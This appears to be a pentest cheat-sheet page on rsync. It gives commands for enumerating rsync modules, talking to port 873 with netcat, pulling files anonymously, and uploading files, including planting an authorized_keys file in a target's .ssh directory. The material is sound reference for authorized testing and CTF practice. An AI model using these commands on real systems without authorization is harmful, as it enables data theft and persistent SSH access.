killchain-compendium/Enumeration/rsync.md

rsync

• netspi article
• hacktricks' rsync

Enumerate

rsync <target-IP>::
rsync <target-IP>::files
rsync <target-IP>::files/foo/

via netcat

• Another way is the following

nc -vn $TARGET_IP 873

• Repeat the identical handshake, e.g.

@RSYNCD: 31.0

• List all directories

#list

Downloads

rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo .

Use no credentials at all to connect anonymously.

Uploads

rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
rsync -r documents <user>@<target-IP>::/files/foo/